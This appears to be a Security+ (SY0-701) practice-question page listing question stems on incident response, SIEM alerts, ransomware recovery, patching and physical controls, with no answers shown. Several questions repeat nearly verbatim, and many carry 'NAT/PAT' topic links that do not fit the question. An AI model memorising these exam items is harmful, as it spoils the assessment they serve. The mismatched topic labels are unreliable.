After a ransomware event, the team restores a file server from backup, but management wants proof that the restore process will work before the backups are declared trusted. What should be done next?

Question 242hardmulti select
Read the full Security Operations explanation →

A SIEM report shows this sequence over 25 minutes: the same public IP submitted one failed password attempt against 53 different accounts, then one account successfully authenticated, created an inbox forwarding rule, and downloaded hundreds of messages through the web portal. Which two conclusions are best supported? Select two.

Question 243easymultiple choice
Read the full Security Operations explanation →

Based on the exhibit, what should the analyst do next to limit the impact of the suspected compromise?

Exhibit

EDR Alert Summary
Host: FIN-LT-22
Severity: High
Detection: Suspicious PowerShell with encoded command
Parent Process: winword.exe
Network Activity: outbound connection to 203.0.113.77:4444
User Note: 'The laptop is running very slowly and pop-ups started after opening an attachment.'
Question 244mediummultiple choice
Read the full NAT/PAT explanation →

A web team is moving a customer portal behind a new inspection device. They need something that can examine HTTP requests, block malicious patterns like injection attempts, and still allow normal browsing. Which control is most appropriate?

Question 245mediummultiple choice
Read the full NAT/PAT explanation →

An email gateway receives a macro-enabled spreadsheet from an external supplier. Signature-based scanning does not flag it, but the security team wants to observe whether it drops files, creates persistence, or contacts suspicious domains before delivery to the user. Which tool best meets this need?

Question 246mediummultiple choice
Read the full Security Operations explanation →

Following a ransomware incident, management wants proof that the organization can actually recover from its backups before declaring the backups trustworthy. What should the security team do next?

Question 247mediummultiple choice
Read the full Security Operations explanation →

The web team is placing a public customer portal behind a control that can inspect HTTP requests, block malicious payloads such as SQL injection and cross-site scripting, and still allow legitimate application traffic without rewriting the app. Which control should they deploy?

Question 248mediummultiple choice
Read the full NAT/PAT explanation →

A Linux web server was compromised through an outdated package. The team isolated the host, captured evidence, removed a malicious cron job, patched the vulnerable package, and confirmed no persistence remains. Which incident response phase are they primarily in now?

Question 249mediummultiple choice
Read the full VPN explanation →

A SIEM reviews VPN authentication logs and sees 36 different usernames each receive one failed login attempt from the same source IP over 20 minutes, followed by one successful login to an unrelated account. Which attack is most likely?

Question 250easymultiple choice
Read the full Security Operations explanation →

An office loses power several times each month, causing servers to shut down without warning. Which control best helps keep the systems running long enough for a safe shutdown?

Question 251easymultiple choice
Read the full Security Operations explanation →

A user reports a suspicious pop-up on a workstation and the SOC suspects malware. Which action should the responder take first to contain the threat?

Question 252hardmatching
Read the full Security Operations explanation →

Match each SOC alert artifact to the most useful investigation pivot. Each pivot should help determine whether the alert is a true incident, a false positive, or part of a broader campaign.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Check whether the pattern matches password spraying across accounts rather than a brute-force attempt on one user.

Pivot to parent-child process trees and script-block telemetry on the endpoint.

Compare the query pattern and periodicity for possible DNS tunneling or beaconing.

Correlate with scheduled tasks, recent file creation, and account activity for staging or exfiltration.

Review token/session logs and conditional-access telemetry to see whether a hijacked session or relay attack occurred.

Question 253easymultiple choice
Read the full Security Operations explanation →

Employees in a server room often prop the door open while carrying equipment. What control best helps detect and prevent this behavior?

Question 254easymultiple choice
Read the full Security Operations explanation →

A SOC analyst notices that log timestamps from different servers do not line up during an investigation. What should be implemented to improve event correlation?

Question 255easymultiple choice
Read the full Security Operations explanation →

A branch office loses power briefly several times each month. Which control best helps keep network equipment running long enough for an orderly shutdown?

Question 256easymultiple choice
Read the full Security Operations explanation →

A SOC analyst sees 38 failed logins for a finance user account from one public IP address over 4 minutes, followed by one successful login. What should the analyst do first?

Question 257easymultiple choice
Read the full Security Operations explanation →

A SOC analyst wants to make sure logs from multiple servers can be compared accurately during an incident review. What should be configured on those systems?

Question 258easymultiple choice
Read the full NAT/PAT explanation →

A critical patch must be applied to a production server next week. What is the best way to reduce the risk of downtime if the patch causes a problem?

Question 259easymultiple choice
Read the full Security Operations explanation →

A help desk team needs to update desktops in a call center without interrupting callers during peak hours. What is the best operational approach?

Question 260easymultiple choice
Read the full Security Operations explanation →

A laptop is suspected of being compromised, and the responder wants to preserve useful evidence before shutting it down. What should be done first?

Question 261easymultiple choice
Read the full NAT/PAT explanation →

Before applying a critical patch to a production application server, which action best reduces the risk of extended downtime if the patch fails?

Question 262easymultiple choice
Read the full Security Operations explanation →

A user reports a ransomware note on one department file share, but other departments are still working normally. What is the best first containment action?

Question 263mediummatching
Read the full Security Operations explanation →

Match each security monitoring artifact from the SOC alert queue to the best investigation focus.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Investigate possible script-based malware execution launched through a document

Check for suspicious domain lookups that may indicate command-and-control activity

Look for beaconing behavior from a potentially compromised endpoint

Assess for stolen credentials or credential-stuffing activity

Question 264easymultiple choice
Read the full NAT/PAT explanation →

A critical patch must be applied to a retail point-of-sale server. What is the best way to reduce business disruption?

Question 265mediummatching
Read the full NAT/PAT explanation →

Match each change-management practice to the best description for reducing patching risk in production.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Use a phased rollout to catch compatibility issues early

Provide a rollback or backout plan if the patch fails

Place the work inside a maintenance window

Create a baseline that supports recovery and comparison

Apply change control and obtain approval

Question 266easymultiple choice
Read the full Security Operations explanation →

A server room is sometimes left open while technicians carry equipment in and out. Which control best helps detect and discourage unauthorized entry?

Question 267mediummatching
Read the full Security Operations explanation →

Match each incident response action to its primary purpose during a suspected endpoint compromise.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Contain the incident and limit spread to other systems

Preserve evidence that could disappear after power-off

Eradicate persistence and return the system to a trusted state

Recover business operations and return service to normal

Complete lessons learned and improve future response

Question 268easymultiple choice
Read the full Security Operations explanation →

A SIEM alert shows 120 failed logins for one user account from three different countries within 10 minutes, followed by a successful login. What should the analyst do first?

Question 269easymultiple choice
Read the full Security Operations explanation →

After a phishing incident, the security team wants to preserve evidence for later review. Which action is most appropriate?

Question 270easymultiple choice
Read the full Security Operations explanation →

A SIEM correlation rule alerts when a single user account fails to authenticate 20 times in 5 minutes and then succeeds from the same source IP. What is the most likely reason the team should investigate this event?

Question 271hardmatching
Read the full NAT/PAT explanation →

Match each detection pattern to the most likely security issue. Each item has one best match.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Living-off-the-land or fileless malware execution

DNS tunneling or command-and-control beaconing

Password spraying or credential stuffing that succeeded

Compromised privileged credentials with persistence and post-exploitation activity

Question 272easymultiple choice
Read the full Security Operations explanation →

An EDR alert shows a user workstation launching an unfamiliar executable from the Downloads folder and then making repeated outbound connections to an IP address in another country. What is the best first response by the security team?

Question 273mediummultiple choice
Read the full Security Operations explanation →

An EDR console alerts that powershell.exe launched with an encoded command on a finance workstation, and a minute later the host begins making repeated outbound connections to an unfamiliar IP address. What is the best initial response?

Question 274mediummultiple choice
Read the full Security Operations explanation →

A hardening script is pushed to a production web server and, within minutes, the application stops accepting secure connections. The team discovers the script disabled a required TLS setting that the legacy application still needs. What should have been in place to reduce the impact of this change?

Question 275mediummultiple choice
Read the full DNS explanation →

An NDR tool shows a production web server sending small, periodic DNS queries to random-looking subdomains under a domain the company does not use. The pattern repeats every 60 seconds, even when normal web traffic is idle. What is the best interpretation and next step?

Question 276easymultiple choice
Read the full Security Operations explanation →

A file server begins encrypting documents, and the SOC confirms the activity is malicious. Which incident response step should happen first to limit further damage?

Question 277mediummultiple choice
Read the full VPN explanation →

A SOC analyst receives an alert from the VPN appliance and identity platform. In the last 10 minutes, a user account had 14 failed VPN logons from one country, then one successful login from a different country. The user calls the help desk and says they have not used their account today. What should the analyst do first?

Question 278easymultiple choice
Read the full Security Operations explanation →

After a workstation hardening baseline is updated, the security team wants to confirm that finance laptops actually match the new settings. Which control is the best way to verify this?

Question 279mediummultiple choice
Read the full Security Operations explanation →

A nightly backup job shows "Completed successfully" in the backup console, but a test restore fails with an authentication error after the backup service account password was rotated last week. What is the best next step?

Question 280mediummultiple choice
Read the full Security Operations explanation →

A manager asks the security team to let Human Resources inspect the files on a laptop suspected of containing stolen customer data before IT touches it. What is the best response?

Question 281mediummultiple choice
Read the full Security Operations explanation →

An organization is retiring a batch of laptops with SSDs. All of the systems used full-disk encryption and stored sensitive internal documents. What is the best action before the devices leave the company?

Question 282mediummultiple choice
Read the full NAT/PAT explanation →

A vulnerability scan finds that an old print server still has SMBv1 enabled. The business says the vendor will not support a patch for at least two months, but the server must stay online. What is the best temporary mitigation?

Question 283easymultiple choice
Read the full NAT/PAT explanation →

A security scan finds a critical patch missing on a public-facing web server. The patch has already been tested in the lab and approved for deployment. What should the operations team do next?

Question 284mediummulti select
Read the full Security Operations explanation →

A security analyst is reviewing incident response procedures. Which three of the following activities are typically performed during the 'Containment, Eradication, and Recovery' phase of the incident response process? (Choose three.)

Question 285mediummulti select
Read the full Security Operations explanation →

An organization is implementing a new Security Information and Event Management (SIEM) system. Which three of the following are primary capabilities that a SIEM provides to support security operations? (Choose three.)

Question 286mediummulti select
Read the full Security Operations explanation →

A company is implementing controls to protect against insider threats. Which three of the following controls are most effective for detecting and preventing data exfiltration by a malicious insider? (Choose three.)

Question 287mediummulti select
Read the full Security Operations explanation →

A security operations center (SOC) analyst is investigating a potential malware outbreak. Which three of the following indicators of compromise (IOCs) would provide the strongest evidence of malicious activity? (Choose three.)

Question 288mediummulti select
Read the full Security Operations explanation →

A security analyst is reviewing the organization's incident response procedures. According to the NIST SP 800-61 framework, which four of the following are recognized phases of the incident response lifecycle? (Choose four.)

Question 289mediummulti select
Read the full Security Operations explanation →

An organization is implementing a Security Information and Event Management (SIEM) system to enhance its security monitoring capabilities. Which four of the following are primary functions of a SIEM? (Choose four.)

Question 290mediumdrag order
Study the full AAA explanation →

Drag and drop the steps for the RADIUS authentication process into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order
1Step 1
2Step 2
3Step 3
4Step 4
5Step 5
Question 291mediumdrag order
Read the full Security Operations explanation →

Drag and drop the steps to implement a backup strategy following the 3-2-1 rule into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order
1Step 1
2Step 2
3Step 3
4Step 4
5Step 5

Practice tests

Scored 10-question sessions with instant feedback and explanations.

SY0-701 Practice Test 1 — 10 Questions→SY0-701 Practice Test 2 — 10 Questions→SY0-701 Practice Test 3 — 10 Questions→SY0-701 Practice Test 4 — 10 Questions→SY0-701 Practice Test 5 — 10 Questions→SY0-701 Practice Exam 1 — 20 Questions→SY0-701 Practice Exam 2 — 20 Questions→SY0-701 Practice Exam 3 — 20 Questions→SY0-701 Practice Exam 4 — 20 Questions→Free SY0-701 Practice Test 1 — 30 Questions→Free SY0-701 Practice Test 2 — 30 Questions→Free SY0-701 Practice Test 3 — 30 Questions→SY0-701 Practice Questions 1 — 50 Questions→SY0-701 Practice Questions 2 — 50 Questions→SY0-701 Exam Simulation 1 — 100 Questions→

Practice by domain

Each domain maps to a weighted exam section. Focus on the domain where you are weakest.

General Security ConceptsThreats, Vulnerabilities, and MitigationsSecurity ArchitectureSecurity OperationsSecurity Program Management and Oversight

Practice by scenario

Filter questions by type — troubleshooting, exhibit, drag-and-drop, PBQ, ACLs, OSPF, and more.

Browse scenarios→

Continue studying

All Security Operations setsAll Security Operations questionsSY0-701 Practice Hub